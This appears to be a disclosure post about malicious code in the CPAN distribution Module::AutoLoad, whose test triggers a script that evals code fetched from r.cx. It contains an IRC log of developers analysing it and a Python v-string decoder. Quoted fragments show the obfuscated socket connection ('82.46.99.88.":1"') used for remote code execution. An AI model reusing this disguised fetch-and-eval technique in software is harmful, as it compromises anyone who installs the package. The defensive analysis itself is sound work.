Not found by me, but I'm not sure if anyone else has reported this yet. It was discussed in magnet#toolchain earlier today, and mst raised the question of who to contact about it.

It looks like Module::AutoLoad is running malicious code fetched from http://r.cx/. It might have originally been non-malicious, but it currently appears to be some kind of rootkit or iPhone jailbreak or something. The trigger itself seems to be this test running: https://metacpan.org/source/BBB/Module-AutoLoad-0.06/t/05_rcx.t

This appears to have been known about for a few years by some people, but it's the first I'm seeing of it: https://stackoverflow.com/questions/35212843/perl-understanding-botstrap

Below is the entire conversation from IRC about the discovery:

18:17:47 < haarg> regarding potentially malicious code on cpan
18:17:49 < haarg> https://metacpan.org/source/BBB/Module-AutoLoad-0.06/t/05_rcx.t
18:18:40 < Grinnz> oh god
18:19:02 < haarg> let me know if you figure out what it does
18:19:17 < Grinnz> i've figured out enough to wonder what the fuck this is doing here
18:19:32 < ether> what it *wants* to do is take the location of the current .t file, go up one dir and find contrib/RCX.pl and then run that script
18:19:32 < haarg> it's like 5 steps of insanity, most of which involve evaling code read straight off a random internet server
18:19:45 < haarg> yeah, now look at that script
18:19:47 < Grinnz> ether: yeah that script is where the scary part starts
18:20:26 * ether ಠ_ಠ
18:20:27 < Grinnz> also: 82.46.99.88.":1"
18:20:43 < Grinnz> ... this is concatenating a vstring with a string
18:20:48 < Grinnz> how would that ever work
18:21:14 < ether> I wonder what used to be at 82.46.99.88
18:22:09 < haarg> https://perlbot.pl/p/1133d2
18:22:29 < ether> he's up front about it being black magic in the docs
18:22:35 < ether> but this shit should have never been put on cpan
18:22:55 < Grinnz> "botstrap" is also cute
18:23:03 < haarg> it's not just "black magic" it's "active remote exploit"
18:23:52 < Grinnz> mst / klapperl ^
18:24:06 < haarg> this is the eval: https://perlbot.pl/p/ui358q
18:24:12 < veesh> wow, that is not acceptable
18:24:17 < haarg> the unpack i mean
18:25:24 < haarg> next step: https://perlbot.pl/p/o1lk67
18:26:15 < haarg> next step: https://perlbot.pl/p/gkoxmt
18:26:52 < Grinnz> fyi that has been there since the first release of that dist in 2011
18:27:10 < Grinnz> though with different ips
18:30:03 < ether> 82.46.99.88.":1" = R.cX:1
18:30:11 < Grinnz> oh dear god
18:30:22 < Grinnz> so it's a vstring and not an ip at all
18:30:23 < ether> what does IO::Socket::INET do with that? is :1 a port number?
18:30:26 < Grinnz> yes
18:30:49 < ether> I missed haarg's first paste, https://perlbot.pl/p/1133d2 - that makes it more clear :)
18:30:56 < ether> jfc
18:31:08 < ether> burn it with fire
18:31:29 < haarg> i haven't traced the next step because it's a pain to decode without running the whole thing
18:33:07 < veesh> https://stackoverflow.com/questions/35212843/perl-understanding-botstrap
18:35:21 < ether> I wonder if those guys ever did report this to modules@perl.org
18:35:25 < ether> narrator: they did not.
18:36:12 < ether> I don't see how r.cx could have been hacked and these eval chains still work
18:36:17 < ether> therefore, this was all intentional
18:36:29 < ether> burn it all down and bury this guy at sea
18:36:42 < ether> mst: would you agree?
18:38:44 < veesh> i just noticed now that the OP on the SO question was asking how to port the code to python
18:39:00 < veesh> i'm glad that all those people left perl 20 years ago
18:43:10 * Grinnz commented on the SO answer with some non-malicious solutions to this problem
18:44:59 * ether flagged for moderator attention to get it taken down
18:45:56 < haarg> i'm not having any luck tracing what the code does further than what i posted so far
18:46:07 < haarg> i need a VM or something
18:47:11 < veesh> docker sounds like a good choice?
18:47:20 < Grinnz> sounds like a job for simcop2387
18:57:15 < ether> I tried searching for those tags - SHAtter GreenPois0n @GeoHot - but got lost in a spiral of l33tsp33k and had to lie down
19:03:01 -!- Pali [~p...@ip-89-102-255-175.net.upcbroadband.cz] has quit [Ping timeout: 360 seconds]
19:03:15 -!- brunoramos_ [~brunoramo@94.252.122.216] has joined #toolchain
19:05:55 -!- brunoramos [~brunoramo@94.252.122.22] has quit [Ping timeout: 360 seconds]
19:05:55 -!- brunoramos_ is now known as brunoramos
19:35:45 < Grinnz> http://neilb.org/2020/07/24/inconsistent-permissions.html - looks like the usual use of AUTHORITY is done by default now, neat
19:35:46 < dipsy> [ Inconsistent permissions on CPAN modules ]
19:35:49 < simcop2387> Grinnz: haarg: hrm?
19:36:20 < Grinnz> simcop2387: attempting to figure out what some malicious code does
19:36:58 < simcop2387> oh fun, yea the pastebin is hopefully nice for that, but it's one reason why i refuse to do a full cpan test run until i get a proper sandbox for it set up
19:38:30 < simcop2387> it looks almost like the EFI stuff in modern UEFI systems? like it's trying to load something into the vars there?
19:38:48 < simcop2387> or maybe it's just pretending to do so
19:39:34 < stigo> seems like a distraction to me, GreenPois0n pops up an old ios jailbreak for instance.
19:40:16 < simcop2387> yea after reading the rest of the links it looks like it's loading an iphone jailbreak of some kind. possibly to infect any attached devices
19:40:32 < Grinnz> it seems to me like the guy typed in "how to rootkit for noobs" in google and attached his code to that
19:40:47 < simcop2387> maybe
19:43:29 < stigo> almost like a ctf, interesting that r.cx:1 doesn't close the socket after delivering the first code part.
19:52:57 < stigo> some of r.cx's zone file: https://tpaste.us/ql09
20:17:25 < stigo> aha, this seems to be the tool used: http://www.perlobfuscator.com
20:17:26 < dipsy> [ Free Perl Obfuscator ]
20:23:20 < Grinnz> oh god
20:24:27 -!- haj [~thunde...@ip5f5ac614.dynamic.kabel-deutschland.de] has quit [Quit: haj]
20:27:21 < mohawk> at the bottom it offers a de-obfuscator
20:43:55 < simcop2387> stigo++
21:40:17 < mst> yeah, somebody email mod...@perl.org, klapp...@cpan.org please
21:41:13 < simcop2387> if no one has done it yet, i'll do it shortly.
21:41:20 < mst> cheers
21:41:31 < simcop2387> i need to do some dishes and hand feed the cat first though
21:41:34 < mst> up to eyeballs in something else, would prefer somebody who was paying attention to do so
21:41:40 < mst> aye, fair
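The trick the channel works out above is that `82.46.99.88.":1"` is not an IP address: Perl parses a bare number with two or more dots as a v-string (one character per dot-separated code point), so the literal is "R.cX" and the whole expression is "R.cX:1", a host and port. The following is an added example, not part of the original report or of the distribution's code: a small Python helper that finds v-string literals in Perl source and statically evaluates constants-only concatenations of v-strings and quoted strings, so such a target can be recovered without handing the suspect code to perl (which is exactly what haarg wanted to avoid). The Perl snippet inside it is constructed for illustration; the regexes are a heuristic, not a Perl parser.

```python
import re
from typing import List, Tuple

# Perl parses a bare numeric literal with two or more dots, e.g. 82.46.99.88,
# as a "v-string": each dot-separated integer is the code point of one
# character, so 82.46.99.88 is "R.cX", not an IP address. With a leading 'v'
# (v72.105) a single component is enough.
VSTRING = r"v\d+(?:\.\d+)*|\d+(?:\.\d+){2,}"

# Not preceded by a sigil, identifier character or dot; not followed by an
# identifier character. Quoting is not tracked, so this is a heuristic scanner.
VSTRING_RE = re.compile(r"(?<![\w$@%.])(?:" + VSTRING + r")(?!\w)")

# Tokens of a constants-only Perl concatenation: a v-string, a double- or
# single-quoted string without escapes, or the '.' concatenation operator.
TOKEN_RE = re.compile(
    r"\s*(?:(?P<vstr>" + VSTRING + r")"
    r'|"(?P<dq>[^"\\]*)"'
    r"|'(?P<sq>[^'\\]*)'"
    r"|(?P<cat>\.))"
)

# Constructed sample for this example, not code from the distribution.
SAMPLE_PERL = r'''
my $peer = 82.46.99.88.":1";
my $sock = IO::Socket::INET->new(PeerAddr => $peer);
my $ver  = 5.010;    # one dot: an ordinary number, not a v-string
my $tag  = v72.105;  # v-prefixed: a v-string
'''


def decode_vstring(literal: str) -> str:
    """82.46.99.88 -> 'R.cX' (chr(82) chr(46) chr(99) chr(88))."""
    return "".join(chr(int(p)) for p in literal.lstrip("v").split("."))


def find_vstrings(src: str) -> List[Tuple[str, str]]:
    """Return (literal, decoded) for every v-string-looking literal in src.

    A dotted number inside a quoted string (e.g. "10.0.0.1") is reported
    too, because quoting is not tracked; see suspicious_vstrings().
    """
    return [(m.group(0), decode_vstring(m.group(0))) for m in VSTRING_RE.finditer(src)]


def suspicious_vstrings(src: str) -> List[Tuple[str, str]]:
    """Keep only v-strings that decode to printable ASCII, i.e. hidden text.

    A real dotted-quad decodes to control characters (chr(10), chr(0), ...)
    and is dropped; an obfuscated hostname survives.
    """
    return [(lit, dec) for lit, dec in find_vstrings(src)
            if dec.isascii() and dec.isprintable()]


def eval_constant_concat(expr: str) -> str:
    """Statically evaluate a constants-only concatenation such as
    82.46.99.88.":1" -> 'R.cX:1'.

    Anything other than a v-string, a plain quoted string or '.' raises
    ValueError, so variables and function calls are never "evaluated".
    """
    expr = expr.strip()
    parts: List[str] = []
    pos, want_operand = 0, True
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if m is None:
            raise ValueError(f"unsupported token at {expr[pos:]!r}")
        pos = m.end()
        if m.group("cat") is not None:
            if want_operand:
                raise ValueError("'.' without a left operand")
            want_operand = True
            continue
        if not want_operand:
            raise ValueError("two operands without '.' between them")
        if m.group("vstr") is not None:
            parts.append(decode_vstring(m.group("vstr")))
        elif m.group("dq") is not None:
            parts.append(m.group("dq"))
        else:
            parts.append(m.group("sq"))
        want_operand = False
    if want_operand:
        raise ValueError("expression ends with '.'")
    return "".join(parts)


if __name__ == "__main__":
    for literal, decoded in suspicious_vstrings(SAMPLE_PERL):
        print(f"{literal:>14} -> {decoded!r}")
    print(eval_constant_concat('82.46.99.88.":1"'))
```

This only recovers the first hop (where the bootstrap connects); what comes back over that socket is code that the scanner cannot see, which is why the channel's conclusion that the later stages need a VM or sandbox still stands. The decoder refuses anything that is not a literal, so a line like `$host . ":1"` produces an error rather than a guess.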